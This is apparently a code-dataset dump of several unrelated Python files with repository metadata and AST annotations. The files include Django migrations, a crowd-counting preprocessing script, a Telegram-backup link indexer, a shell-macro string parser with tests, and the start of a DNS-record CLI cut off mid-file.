'_messages.MessageField', (), '', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((1792, 9, 1792, 32), 'apitools.base.protorpclite.messages.BytesField', '_messages.BytesField', ({(1792, 30, 1792, 31): '2'}, {}), '(2)', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((1793, 12, 1793, 70), 'apitools.base.protorpclite.messages.IntegerField', '_messages.IntegerField', (), '', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((1806, 11, 1806, 46), 'apitools.base.protorpclite.messages.MessageField', '_messages.MessageField', ({(1806, 34, 1806, 42): '"""Policy"""', (1806, 44, 1806, 45): '1'}, {}), "('Policy', 1)", True, 'from apitools.base.protorpclite import messages as _messages\n'), ((1858, 13, 1858, 60), 'apitools.base.protorpclite.messages.EnumField', '_messages.EnumField', ({(1858, 33, 1858, 56): '"""FXgafvValueValuesEnum"""', (1858, 58, 1858, 59): '1'}, {}), "('FXgafvValueValuesEnum', 1)", True, 'from apitools.base.protorpclite import messages as _messages\n'), ((1859, 17, 1859, 41), 'apitools.base.protorpclite.messages.StringField', '_messages.StringField', ({(1859, 39, 1859, 40): '2'}, {}), '(2)', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((1860, 8, 1860, 69), 'apitools.base.protorpclite.messages.EnumField', 
'_messages.EnumField', (), '', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((1861, 13, 1861, 37), 'apitools.base.protorpclite.messages.StringField', '_messages.StringField', ({(1861, 35, 1861, 36): '4'}, {}), '(4)', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((1862, 11, 1862, 35), 'apitools.base.protorpclite.messages.StringField', '_messages.StringField', ({(1862, 33, 1862, 34): '5'}, {}), '(5)', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((1863, 8, 1863, 32), 'apitools.base.protorpclite.messages.StringField', '_messages.StringField', ({(1863, 30, 1863, 31): '6'}, {}), '(6)', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((1864, 16, 1864, 40), 'apitools.base.protorpclite.messages.StringField', '_messages.StringField', ({(1864, 38, 1864, 39): '7'}, {}), '(7)', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((1865, 16, 1865, 55), 'apitools.base.protorpclite.messages.BooleanField', '_messages.BooleanField', (), '', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((1866, 14, 1866, 38), 'apitools.base.protorpclite.messages.StringField', '_messages.StringField', ({(1866, 36, 1866, 37): '9'}, {}), '(9)', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((1867, 10, 1867, 35), 'apitools.base.protorpclite.messages.StringField', '_messages.StringField', ({(1867, 32, 1867, 34): '10'}, {}), '(10)', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((1868, 15, 1868, 40), 'apitools.base.protorpclite.messages.StringField', '_messages.StringField', ({(1868, 37, 1868, 39): '11'}, {}), '(11)', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((1869, 20, 1869, 45), 'apitools.base.protorpclite.messages.StringField', '_messages.StringField', ({(1869, 42, 1869, 44): '12'}, {}), '(12)', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((1882, 16, 1882, 55), 'apitools.base.protorpclite.messages.StringField', '_messages.StringField', (), '', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((1893, 16, 1893, 55), 'apitools.base.protorpclite.messages.StringField', '_messages.StringField', (), '', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((1550, 27, 1550, 89), 'apitools.base.protorpclite.messages.MessageField', '_messages.MessageField', (), '', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((1651, 27, 1651, 89), 'apitools.base.protorpclite.messages.MessageField', '_messages.MessageField', (), '', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((1547, 12, 1547, 36), 'apitools.base.protorpclite.messages.StringField', '_messages.StringField', ({(1547, 34, 1547, 35): '1'}, {}), '(1)', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((1548, 14, 1548, 80), 'apitools.base.protorpclite.messages.MessageField', '_messages.MessageField', ({(1548, 37, 1548, 76): '"""GoogleCloudDatacatalogV1beta1TagField"""', (1548, 78, 1548, 79): '2'}, {}), "('GoogleCloudDatacatalogV1beta1TagField', 2)", True, 'from apitools.base.protorpclite import messages as _messages\n'), ((1648, 12, 1648, 36), 'apitools.base.protorpclite.messages.StringField', '_messages.StringField', ({(1648, 34, 1648, 35): '1'}, {}), '(1)', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((1649, 14, 1649, 88), 
'apitools.base.protorpclite.messages.MessageField', '_messages.MessageField', ({(1649, 37, 1649, 84): '"""GoogleCloudDatacatalogV1beta1TagTemplateField"""', (1649, 86, 1649, 87): '2'}, {}), "('GoogleCloudDatacatalogV1beta1TagTemplateField', 2)", True, 'from apitools.base.protorpclite import messages as _messages\n')]
mgovoni-devel/MatD3
materials/migrations/0072_auto_20190422_1708.py
5b68d147f886bce427f92bb560159e62cec2d4e7
# Generated by Django 2.1.7 on 2019-04-22 21:08

from django.db import migrations


class Migration(migrations.Migration):

    dependencies = [
        ('materials', '0071_auto_20190416_1557'),
    ]

    operations = [
        migrations.RemoveField(
            model_name='atomicpositions',
            name='idinfo_ptr',
        ),
        migrations.RemoveField(
            model_name='atomicpositions',
            name='synthesis_method',
        ),
        migrations.RemoveField(
            model_name='atomicpositions',
            name='system',
        ),
        migrations.DeleteModel(
            name='AtomicPositions',
        ),
    ]
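This migration drops the legacy `AtomicPositions` model by first removing its relational fields and then deleting the model itself. Below is a minimal sketch of applying or rolling it back from Python; it assumes a configured Django project with the `materials` app installed (the usual route is simply `manage.py migrate`).

# Sketch only: assumes DJANGO_SETTINGS_MODULE points at the project settings
# and that the `materials` app containing these migrations is installed.
import django
from django.core.management import call_command

django.setup()

# Apply everything up to and including this migration.
call_command("migrate", "materials", "0072_auto_20190422_1708")

# Roll back to the previous state named in `dependencies`; the table is
# recreated from the earlier migration state, but removed data is gone.
call_command("migrate", "materials", "0071_auto_20190416_1557")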
[((13, 8, 16, 9), 'django.db.migrations.RemoveField', 'migrations.RemoveField', (), '', False, 'from django.db import migrations\n'), ((17, 8, 20, 9), 'django.db.migrations.RemoveField', 'migrations.RemoveField', (), '', False, 'from django.db import migrations\n'), ((21, 8, 24, 9), 'django.db.migrations.RemoveField', 'migrations.RemoveField', (), '', False, 'from django.db import migrations\n'), ((25, 8, 27, 9), 'django.db.migrations.DeleteModel', 'migrations.DeleteModel', (), '', False, 'from django.db import migrations\n')]
sadbb/CVCode
Deep-Learning/Crowd-Count/src/data_preprocess.py
c7c8b527af786d8f113122231e6296987b242b59
# -*- coding:utf-8 -*-
# ------------------------
# written by Songjian Chen
# 2018-10
# ------------------------
import os
import skimage.io
from skimage.color import rgb2gray
import skimage.transform
from scipy.io import loadmat
import numpy as np
import cv2
import math
import warnings
import random
import torch
import matplotlib.pyplot as plt

warnings.filterwarnings("ignore")


def gaussian_kernel(image, points):
    # Build a density map: each annotated point contributes a small 2D Gaussian
    # (normalized to unit mass), so the map integrates to roughly len(points).
    image_density = np.zeros(image.shape)
    h, w = image_density.shape

    if len(points) == 0:
        return image_density

    for j in range(len(points)):
        f_sz = 15
        sigma = 4.0
        # convert x, y to int and clamp to the image bounds
        x = min(w, max(0, int(points[j, 0])))
        y = min(h, max(0, int(points[j, 1])))
        gap = f_sz // 2
        x1 = x - gap if x - gap > 0 else 0
        x2 = x + gap if x + gap < w else w - 1
        y1 = y - gap if y - gap > 0 else 0
        y2 = y + gap if y + gap < h else h - 1
        # generate 2d gaussian kernel as the outer product of two 1d kernels
        kx = cv2.getGaussianKernel(y2 - y1 + 1, sigma=sigma)
        ky = cv2.getGaussianKernel(x2 - x1 + 1, sigma=sigma)
        gaussian = np.multiply(kx, ky.T)

        image_density[y1:y2 + 1, x1:x2 + 1] += gaussian

    return image_density


def extract_data(mode="train", patch_number=9, part="A"):
    num_images = 300 if mode == "train" else 182
    # original path
    dataset_path = "../data/original/part_{0}_final/".format(part)
    mode_data = os.path.join(dataset_path, "{0}_data".format(mode))
    mode_images = os.path.join(mode_data, "images")
    mode_ground_truth = os.path.join(mode_data, "ground_truth")
    # preprocessed path
    preprocessed_mode = "../data/preprocessed/{0}/".format(mode)
    preprocessed_mode_density = "../data/preprocessed/{0}_density/".format(mode)
    if not os.path.exists("../data/preprocessed/"):
        os.mkdir("../data/preprocessed/")
    if not os.path.exists(preprocessed_mode):
        os.mkdir(preprocessed_mode)
    if not os.path.exists(preprocessed_mode_density):
        os.mkdir(preprocessed_mode_density)

    # convert images to gray-density for each
    for index in range(1, num_images + 1):
        if index % 10 == 9:
            print("{0} images have been processed".format(index + 1))
        image_path = os.path.join(mode_images, "IMG_{0}.jpg".format(index))
        ground_truth_path = os.path.join(mode_ground_truth, "GT_IMG_{0}.mat".format(index))
        image = skimage.io.imread(image_path)
        # convert to gray map
        if image.shape[-1] == 3:
            image = rgb2gray(image)
        mat = loadmat(ground_truth_path)
        image_info = mat["image_info"]
        ann_points = image_info[0][0][0][0][0]
        # gaussian transfer
        image_density = gaussian_kernel(image, ann_points)

        # split image into 9 patches where patch is 1/4 size
        h, w = image.shape
        w_block = math.floor(w / 8)
        h_block = math.floor(h / 8)

        for j in range(patch_number):
            # sample a random patch center, then crop image and density together
            x = math.floor((w - 2 * w_block) * random.random() + w_block)
            y = math.floor((h - 2 * h_block) * random.random() + h_block)
            image_sample = image[y - h_block:y + h_block, x - w_block:x + w_block]
            image_density_sample = image_density[y - h_block:y + h_block, x - w_block:x + w_block]

            img_idx = "{0}_{1}".format(index, j)
            np.save(os.path.join(preprocessed_mode_density, "{0}.npy".format(img_idx)), image_density_sample)
            skimage.io.imsave(os.path.join(preprocessed_mode, "{0}.jpg".format(img_idx)), image_sample)


def extract_test_data(part="A"):
    num_images = 183 if part == "A" else 317
    test_data_path = "../data/original/part_{part}_final/test_data/images".format(part=part)
    test_ground_path = "../data/original/part_{part}_final/test_data/ground_truth".format(part=part)
    test_density_path = "../data/preprocessed/test_density"

    print("create directory........")
    if not os.path.exists(test_density_path):
        os.mkdir(test_density_path)
    print("begin to preprocess test data........")

    for index in range(1, num_images):
        if index % 10 == 0:
            print("{num} images are done".format(num=index))
        image_path = os.path.join(test_data_path, "IMG_{0}.jpg".format(index))
        ground_truth_path = os.path.join(test_ground_path, "GT_IMG_{0}.mat".format(index))
        # load mat and image
        image = skimage.io.imread(image_path)
        if image.shape[-1] == 3:
            image = rgb2gray(image)
        mat = loadmat(ground_truth_path)
        image_info = mat["image_info"]
        # ann_points: points pixels mean people
        # number: number of people in the image
        ann_points = image_info[0][0][0][0][0]
        number = image_info[0][0][0][0][1]
        h = float(image.shape[0])
        w = float(image.shape[1])
        # convert images to density
        image_density = gaussian_kernel(image, ann_points)
        np.save(os.path.join(test_density_path, "IMG_{0}.npy".format(index)), image_density)


extract_test_data()
[((19, 0, 19, 33), 'warnings.filterwarnings', 'warnings.filterwarnings', ({(19, 24, 19, 32): '"""ignore"""'}, {}), "('ignore')", False, 'import warnings\n'), ((23, 20, 23, 41), 'numpy.zeros', 'np.zeros', ({(23, 29, 23, 40): 'image.shape'}, {}), '(image.shape)', True, 'import numpy as np\n'), ((56, 18, 56, 51), 'os.path.join', 'os.path.join', ({(56, 31, 56, 40): 'mode_data', (56, 42, 56, 50): '"""images"""'}, {}), "(mode_data, 'images')", False, 'import os\n'), ((57, 24, 57, 63), 'os.path.join', 'os.path.join', ({(57, 37, 57, 46): 'mode_data', (57, 48, 57, 62): '"""ground_truth"""'}, {}), "(mode_data, 'ground_truth')", False, 'import os\n'), ((42, 13, 42, 60), 'cv2.getGaussianKernel', 'cv2.getGaussianKernel', (), '', False, 'import cv2\n'), ((43, 13, 43, 60), 'cv2.getGaussianKernel', 'cv2.getGaussianKernel', (), '', False, 'import cv2\n'), ((44, 19, 44, 40), 'numpy.multiply', 'np.multiply', ({(44, 31, 44, 33): 'kx', (44, 35, 44, 39): 'ky.T'}, {}), '(kx, ky.T)', True, 'import numpy as np\n'), ((61, 11, 61, 50), 'os.path.exists', 'os.path.exists', ({(61, 26, 61, 49): '"""../data/preprocessed/"""'}, {}), "('../data/preprocessed/')", False, 'import os\n'), ((62, 8, 62, 41), 'os.mkdir', 'os.mkdir', ({(62, 17, 62, 40): '"""../data/preprocessed/"""'}, {}), "('../data/preprocessed/')", False, 'import os\n'), ((63, 11, 63, 44), 'os.path.exists', 'os.path.exists', ({(63, 26, 63, 43): 'preprocessed_mode'}, {}), '(preprocessed_mode)', False, 'import os\n'), ((64, 8, 64, 35), 'os.mkdir', 'os.mkdir', ({(64, 17, 64, 34): 'preprocessed_mode'}, {}), '(preprocessed_mode)', False, 'import os\n'), ((65, 11, 65, 52), 'os.path.exists', 'os.path.exists', ({(65, 26, 65, 51): 'preprocessed_mode_density'}, {}), '(preprocessed_mode_density)', False, 'import os\n'), ((66, 8, 66, 43), 'os.mkdir', 'os.mkdir', ({(66, 17, 66, 42): 'preprocessed_mode_density'}, {}), '(preprocessed_mode_density)', False, 'import os\n'), ((78, 14, 78, 40), 'scipy.io.loadmat', 'loadmat', ({(78, 22, 78, 39): 'ground_truth_path'}, {}), '(ground_truth_path)', False, 'from scipy.io import loadmat\n'), ((85, 18, 85, 35), 'math.floor', 'math.floor', ({(85, 29, 85, 34): 'w / 8'}, {}), '(w / 8)', False, 'import math\n'), ((86, 18, 86, 35), 'math.floor', 'math.floor', ({(86, 29, 86, 34): 'h / 8'}, {}), '(h / 8)', False, 'import math\n'), ((104, 11, 104, 44), 'os.path.exists', 'os.path.exists', ({(104, 26, 104, 43): 'test_density_path'}, {}), '(test_density_path)', False, 'import os\n'), ((105, 8, 105, 35), 'os.mkdir', 'os.mkdir', ({(105, 17, 105, 34): 'test_density_path'}, {}), '(test_density_path)', False, 'import os\n'), ((118, 14, 118, 40), 'scipy.io.loadmat', 'loadmat', ({(118, 22, 118, 39): 'ground_truth_path'}, {}), '(ground_truth_path)', False, 'from scipy.io import loadmat\n'), ((77, 20, 77, 35), 'skimage.color.rgb2gray', 'rgb2gray', ({(77, 29, 77, 34): 'image'}, {}), '(image)', False, 'from skimage.color import rgb2gray\n'), ((117, 20, 117, 35), 'skimage.color.rgb2gray', 'rgb2gray', ({(117, 29, 117, 34): 'image'}, {}), '(image)', False, 'from skimage.color import rgb2gray\n'), ((88, 47, 88, 62), 'random.random', 'random.random', ({}, {}), '()', False, 'import random\n'), ((89, 47, 89, 62), 'random.random', 'random.random', ({}, {}), '()', False, 'import random\n')]
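Since each per-head kernel above is the outer product of two normalised 1-D Gaussians, the stored density map integrates to roughly the number of annotated heads in a patch. A minimal sanity check, assuming the preprocessing above has been run (the .npy path and index below are hypothetical):

import numpy as np

density = np.load("../data/preprocessed/train_density/1_0.npy")
# The sum of the density patch approximates the number of annotated points that
# fell inside it (slightly lower near the borders, where kernels are clipped).
print("estimated count in patch:", density.sum())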
satyamraj123/set-of-python-programs
for1.py
c9a20b37cddc555704799e5ff277488b7eff58a9
fruit='banana' x=len(fruit) print(x)
[]
samir321-pixel/Django_Intershala
Django_Intershala/recruiter/migrations/0004_auto_20210305_1551.py
77aaa24a34873dab4c3302727d5f43986a99809e
# Generated by Django 3.1.7 on 2021-03-05 10:21

from django.db import migrations, models


class Migration(migrations.Migration):

    dependencies = [
        ('recruiter', '0003_auto_20210304_2132'),
    ]

    operations = [
        migrations.RemoveField(
            model_name='recruiter',
            name='middle_Name',
        ),
        migrations.AlterField(
            model_name='recruiter',
            name='first_Name',
            field=models.CharField(max_length=200, null=True),
        ),
        migrations.AlterField(
            model_name='recruiter',
            name='last_Name',
            field=models.CharField(max_length=200, null=True),
        ),
    ]
[((13, 8, 16, 9), 'django.db.migrations.RemoveField', 'migrations.RemoveField', (), '', False, 'from django.db import migrations, models\n'), ((20, 18, 20, 61), 'django.db.models.CharField', 'models.CharField', (), '', False, 'from django.db import migrations, models\n'), ((25, 18, 25, 61), 'django.db.models.CharField', 'models.CharField', (), '', False, 'from django.db import migrations, models\n')]
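For context, the two AlterField operations above converge on plain nullable CharFields; a hypothetical sketch of the resulting model state (the real recruiter/models.py is not part of this row):

from django.db import models

class Recruiter(models.Model):
    # middle_Name was dropped by the RemoveField operation above
    first_Name = models.CharField(max_length=200, null=True)
    last_Name = models.CharField(max_length=200, null=True)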
halhenke/promnesia
src/promnesia/sources/telegram.py
03f46b7e0740790ef091e6f48d0ac2e6bf05bcb7
''' Uses [[https://github.com/fabianonline/telegram_backup#readme][telegram_backup]] database for messages data ''' from pathlib import Path from textwrap import dedent from typing import Optional, Union, TypeVar from urllib.parse import unquote # TODO mm, make it easier to rememember to use... from ..common import PathIsh, Visit, get_logger, Loc, extract_urls, from_epoch, Results, echain # TODO potentially, belongs to my. package # TODO kython? T = TypeVar("T") def unwrap(res: Union[T, Exception]) -> T: if isinstance(res, Exception): raise res else: return res # TODO move to common? def dataset_readonly(db: Path): import dataset # type: ignore # see https://github.com/pudo/dataset/issues/136#issuecomment-128693122 import sqlite3 creator = lambda: sqlite3.connect(f'file:{db}?immutable=1', uri=True) return dataset.connect('sqlite:///' , engine_kwargs={'creator': creator}) def index(database: PathIsh, *, http_only: bool=None) -> Results: """ :param database: the path of the sqlite generated by the _telegram_backup_ java program :param http_only: when true, do not collect IP-addresses and `python.py` strings """ logger = get_logger() path = Path(database) assert path.is_file(), path # TODO could check is_file inside `dataset_readonly()` def make_query(text_query: str): extra_criteria = "AND (M.has_media == 1 OR text LIKE '%http%')" if http_only else "" return dedent( f""" WITH entities AS ( SELECT 'dialog' as type , id , coalesce(username, id) as handle , coalesce(first_name || " " || last_name , username , id ) as display_name FROM users UNION SELECT 'group' as type , id , id as handle , coalesce(name, id) as display_name FROM chats ) SELECT src.display_name AS chatname , src.handle AS chat , snd.display_name AS sender , M.time AS time , {text_query} AS text , M.id AS mid FROM messages AS M /* chat types are 'dialog' (1-1), 'group' and 'supergroup' */ /* this is abit hacky way to handle all groups in one go */ LEFT JOIN entities AS src ON M.source_id = src.id AND src.type = (CASE M.source_type WHEN 'supergroup' THEN 'group' ELSE M.source_type END) LEFT JOIN entities AS snd ON M.sender_id = snd.id AND snd.type = 'dialog' WHERE M.message_type NOT IN ('service_message', 'empty_message') {extra_criteria} ORDER BY time; """) # TODO context manager? with dataset_readonly(path) as db: # TODO yield error if chatname or chat or smth else is null? for row in db.query(make_query('M.text')): try: yield from _handle_row(row) except Exception as ex: yield echain(RuntimeError(f'While handling {row}'), ex) # , None, sys.exc_info()[2] # TODO hmm. traceback isn't preserved; wonder if that's because it's too heavy to attach to every single exception object.. # old (also 'stable') version doesn't have 'json' column yet... 
if 'json' in db['messages'].columns: for row in db.query(make_query("json_extract(json, '$.media.webpage.description')")): try: yield from _handle_row(row) except Exception as ex: yield echain(RuntimeError(f'While handling {row}'), ex) def _handle_row(row) -> Results: text = row['text'] if text is None: return urls = extract_urls(text) if len(urls) == 0: return dt = from_epoch(row['time']) mid: str = unwrap(row['mid']) # TODO perhaps we could be defensive with null sender/chat etc and still emit the Visit sender: str = unwrap(row['sender']) chatname: str = unwrap(row['chatname']) chat: str = unwrap(row['chat']) in_context = f'https://t.me/{chat}/{mid}' for u in urls: # https://www.reddit.com/r/Telegram/comments/6ufwi3/link_to_a_specific_message_in_a_channel_possible/ # hmm, only seems to work on mobile app, but better than nothing... yield Visit( url=unquote(u), dt=dt, context=f"{sender}: {text}", locator=Loc.make( title=f"chat with {chatname}", href=in_context, ), )
[((15, 4, 15, 16), 'typing.TypeVar', 'TypeVar', ({(15, 12, 15, 15): '"""T"""'}, {}), "('T')", False, 'from typing import Optional, Union, TypeVar\n'), ((31, 11, 31, 77), 'dataset.connect', 'dataset.connect', (), '', False, 'import dataset\n'), ((43, 11, 43, 25), 'pathlib.Path', 'Path', ({(43, 16, 43, 24): 'database'}, {}), '(database)', False, 'from pathlib import Path\n'), ((30, 22, 30, 73), 'sqlite3.connect', 'sqlite3.connect', (), '', False, 'import sqlite3\n'), ((48, 15, 79, 16), 'textwrap.dedent', 'dedent', ({(49, 12, 79, 15): 'f"""\n WITH entities AS (\n SELECT \'dialog\' as type\n , id\n , coalesce(username, id) as handle\n , coalesce(first_name || " " || last_name\n , username\n , id\n ) as display_name FROM users\n UNION\n SELECT \'group\' as type\n , id\n , id as handle\n , coalesce(name, id) as display_name FROM chats\n )\n SELECT src.display_name AS chatname\n , src.handle AS chat\n , snd.display_name AS sender\n , M.time AS time\n , {text_query} AS text\n , M.id AS mid\n FROM messages AS M\n /* chat types are \'dialog\' (1-1), \'group\' and \'supergroup\' */\n /* this is abit hacky way to handle all groups in one go */\n LEFT JOIN entities AS src ON M.source_id = src.id AND src.type = (CASE M.source_type WHEN \'supergroup\' THEN \'group\' ELSE M.source_type END)\n LEFT JOIN entities AS snd ON M.sender_id = snd.id AND snd.type = \'dialog\'\n WHERE\n M.message_type NOT IN (\'service_message\', \'empty_message\')\n {extra_criteria}\n ORDER BY time;\n """'}, {}), '(\n f"""\n WITH entities AS (\n SELECT \'dialog\' as type\n , id\n , coalesce(username, id) as handle\n , coalesce(first_name || " " || last_name\n , username\n , id\n ) as display_name FROM users\n UNION\n SELECT \'group\' as type\n , id\n , id as handle\n , coalesce(name, id) as display_name FROM chats\n )\n SELECT src.display_name AS chatname\n , src.handle AS chat\n , snd.display_name AS sender\n , M.time AS time\n , {text_query} AS text\n , M.id AS mid\n FROM messages AS M\n /* chat types are \'dialog\' (1-1), \'group\' and \'supergroup\' */\n /* this is abit hacky way to handle all groups in one go */\n LEFT JOIN entities AS src ON M.source_id = src.id AND src.type = (CASE M.source_type WHEN \'supergroup\' THEN \'group\' ELSE M.source_type END)\n LEFT JOIN entities AS snd ON M.sender_id = snd.id AND snd.type = \'dialog\'\n WHERE\n M.message_type NOT IN (\'service_message\', \'empty_message\')\n {extra_criteria}\n ORDER BY time;\n """\n )', False, 'from textwrap import dedent\n'), ((122, 16, 122, 26), 'urllib.parse.unquote', 'unquote', ({(122, 24, 122, 25): 'u'}, {}), '(u)', False, 'from urllib.parse import unquote\n')]
duaneellissd/shellmacros
shellmacros/istr.py
33b5cd1a8794e35a9540f78dca066b8dfc289c97
''' Created on Dec 27, 2019 @author: duane ''' DOLLAR = ord('$') LBRACE = ord('{') RBRACE = ord('}') LPAREN = ord('(') RPAREN = ord(')') class IStrFindResult(object): OK = 0 NOTFOUND = 1 SYNTAX = 2 def __init__(self): self.result = IStrFindResult.SYNTAX self.lhs = 0 self.rhs = 0 self.name = None class IStr(list): ''' This closely models a basic ASCII string Note: Unicode strings are expressly not supported here. The problem this addresses occurs during macro processing. Sometimes macros are defined externally Other times, macros are fully defined with a package. Often macros need to be resolved either partially or fully When a macro is only external - they get in the way of resolving other macros To work around that, we convert the string into an array of integers Then for every macro byte that is 'external' we add 0x100 This makes the byte 'non-matchable' Later, when we convert the resolved string into we strip the 0x100. ''' IGNORE = 0x100 def __init__(self, s): ''' Constructor ''' # convert to integers list.__init__(self, map(ord, s)) def __str__(self): # return as string, stripping flags return ''.join(map(lambda v: chr(v & 0xff), self)) def sslice(self, lhs, rhs): # return as string, stripping flags return ''.join(map(lambda v: chr(v & 0xff), self[lhs:rhs])) def iarray(self): return self[:] def mark(self, lhs, rhs, flagvalue=IGNORE): ''' Apply flags to locations between left and right hand sides, ie: [lhs:rhs] ''' for idx in range(lhs, rhs): self[idx] |= flagvalue def locate(self, needle, lhs, rhs): '''Find this needle(char) in the hay stack(list).''' try: return self.index(needle, lhs, rhs) except: # not found return -1 def replace(self, lhs, rhs, newcontent): '''replace the data between [lhs:rhs] with newcontent''' self[lhs: rhs] = map(ord, newcontent) def next_macro(self, lhs, rhs): ''' Find a macro within the string, return (lhs,rhs) if found If not found, return (-1,-1) If syntax error, return (-2,-2) ''' result = IStrFindResult() result.lhs = lhs result.rhs = rhs # if it is not long enough... if (rhs - lhs) < 4: result.code = result.NOTFOUND return result # We search for the CLOSING # Consider nested: ${ ${foo}_${bar} } # The first thing we must do is "foo" # So find the close tmp = self.locate(RBRACE, result.lhs,result.rhs) if tmp >= 0: _open_symbol = LBRACE else: tmp = self.locate(RPAREN,result.lhs,result.rhs) _open_symbol = RPAREN if tmp < 0: # not found result.code = result.NOTFOUND return result # We want to end at RHS where the closing symbol is result.rhs = tmp while result.lhs < result.rhs: # find DOLLAR dollar_loc = self.locate(DOLLAR, result.lhs, result.rhs) if dollar_loc < 0: # above, we know we have a CLOSE # We could call this a SYNTAX error # but ... we won't we'll leave this as NOT FOUND result.code = result.NOTFOUND return result # we have: DOLLAR + CLOSE # Can we find DOLLAR + OPEN? ch = self[dollar_loc+1] if ch != _open_symbol: # Nope... 
try again after dollar result.lhs = dollar_loc+1 continue result.lhs = dollar_loc # Do we have a nested macro, ie: ${${x}} tmp = self.locate(DOLLAR, dollar_loc + 1, result.rhs) if tmp >= 0: # we do have a nested macro result.lhs = tmp continue # nope, we are good # Everything between LHS and RHS should be a macro result.code = result.OK result.name = self.sslice(result.lhs + 2, result.rhs) # the RHS should include the closing symbol result.rhs += 1 return result # not found syntax stray dollar or brace result.code = result.SYNTAX return result def test_istr(): def check2(l, r, text, dut): print("----") print("Check (%d,%d)" % (l, r)) print("s = %s" % str(dut)) print("i = %s" % dut.iarray()) result = dut.next_macro(0, len(dut)) if (result.lhs != l) or (result.rhs != r): print("str = %s" % str(dut)) print("int = %s" % dut.iarray()) print("Error: (%d,%d) != (%d,%d)" % (l, r, result.lhs, result.rhs)) assert (False) if text is not None: assert( result.name == text ) dut.mark(l, r) return dut def check(l, r, s): if l >= 0: expected = s[l + 2:r - 1] else: expected = None dut = IStr(s) check2(l, r, expected, dut) st = str(dut) assert (st == s) return dut check(-1, -1, "") check(-1, -1, "a") check(-1, -1, "ab") check(-1, -1, "abc") check(-1, -1, "abcd") check(-1, -1, "abcde") check(-1, -1, "abcdef") check(0, 4, "${a}") check(0, 5, "${ab}") check(0, 6, "${abc}") check(0, 7, "${abcd}") check(1, 5, "a${a}") check(2, 6, "ab${a}") check(3, 7, "abc${a}") check(4, 8, "abcd${a}") check(5, 9, "abcde${a}") check(0, 4, "${a}a") check(0, 4, "${a}ab") check(0, 4, "${a}abc") check(0, 4, "${a}abcd") check(0, 4, "${a}abcde") dut = check(4, 8, "abcd${a}xyz") dut.replace(4, 8, "X") check2(-1, -1, None, dut) r = str(dut) print("Got: %s" % r) assert ("abcdXxyz" == str(dut)) # now nested tests dut = check(5, 9, "abc${${Y}}xyz") dut.replace(5, 9, "X") r = str(dut) assert (r == "abc${X}xyz") dut = check2(3, 7, "${X}", dut) dut.replace(3, 7, "ABC") s = str(dut) r = "abcABCxyz" assert (s == r) print("Success") if __name__ == '__main__': test_istr()
[]
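The IGNORE flag described in the IStr docstring is what makes mark() useful during macro resolution: once a span is flagged, its bytes no longer match '$', '{' or '}', so later passes skip it, while str() still reproduces the original text. A minimal sketch using only the names defined above:

s = IStr("${EXTERNAL}/lib/${local}")
hit = s.next_macro(0, len(s))
print(hit.name)                  # -> EXTERNAL
s.mark(hit.lhs, hit.rhs)         # flag the span as externally defined
hit = s.next_macro(0, len(s))    # flagged bytes are now invisible to the search
print(hit.name)                  # -> local
print(str(s))                    # -> ${EXTERNAL}/lib/${local}  (flags stripped)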
checktheroads/deenis
cli.py
2581e2fcbb08a9c85590bd54e109f24cc87b664f
#!/usr/bin/env python3 """ CLI for Accessing Deenis """ # Standard Imports import sys from pathlib import Path # Module Imports import click # Path Fixes working_dir = Path(__file__).resolve().parent sys.path.append(str(working_dir)) # Project Imports from deenis import Deenis @click.group( help=( "Deenis can be used to group and automate boring DNS tasks. For example, " "`host` can take a hostname, IPv4 Address, and IPv6 Address, and create " "forward A & AAAA, and reverse PTR records (4 actions) with a single command." ) ) def add_records(): """Click Command Group Definition""" # pylint: disable=unnecessary-pass # Dear Pylint: This is how Click likes to do things. Get over it bruh. pass @add_records.command("host", help="Add a Host Record") @click.option("-c", "--config-file", "config_file", help="Path to YAML Config File") @click.option("-4", "--ipv4-address", "ipv4", default=None, help="IPv4 Address") @click.option("-6", "--ipv6-address", "ipv6", default=None, help="IPv6 Address") @click.option("-f", "--fqdn", "fqdn", required=True, help="FQDN") def host(**click_input): """Add host records from CLI""" if not click_input["config_file"]: config_path = Path.cwd().joinpath("deenis.yaml") if not config_path.exists(): raise click.UsageError( click.style( ( f"Config file not specified and not found at {config_path}. " "Please specify a config file path." ), fg="red", bold=True, ) ) elif click_input["config_file"]: config_path = Path().resolve(click_input["config_file"]) if not click_input["ipv4"] and not click_input["ipv6"]: raise click.UsageError( click.style("At least one IP Address is required", fg="red", bold=True) ) try: responses = Deenis(str(config_path)).AddHost( { "hostname": click_input["fqdn"], "ipv4": click_input["ipv4"], "ipv6": click_input["ipv6"], } ) if responses: for res in responses: status, record_record, record, target, errors = res if status == "Success": click.echo( "Added " + click.style(record_record, fg="green", bold=True) + " Record for " + click.style(record, fg="yellow", bold=True) + " Pointing to " + click.style(target, fg="blue", bold=True) ) elif status == "Failure": click.echo( "Error Adding " + click.style(record_record, fg="magenta", bold=True) + " Record for " + click.style(record, fg="cyan", bold=True) + " Pointing to " + click.style(target, fg="red", bold=True) + f"\nErrors:\n" ) for err in errors: click.secho(err, fg="red") if not responses: click.secho("\nNo records were added", fg="magenta", bold=True) except (RuntimeError, AttributeError) as error_exception: raise click.UsageError(click.style(str(error_exception), fg="red", bold=True)) @add_records.command("tenant", help="Bulk Add PTR Records for a Tenant/Customer") @click.option("-c", "--config-file", "config_file", help="Path to YAML Config File") @click.option( "-i", "--crm-id", "crm_id", default=None, help="Unique Tenant Indentifier" ) @click.option( "-4", "--ipv4-prefix", "prefix4", default=None, help="IPv4 Prefix Assignment" ) @click.option( "-6", "--ipv6-prefix", "prefix6", default=None, help="IPv6 Prefix 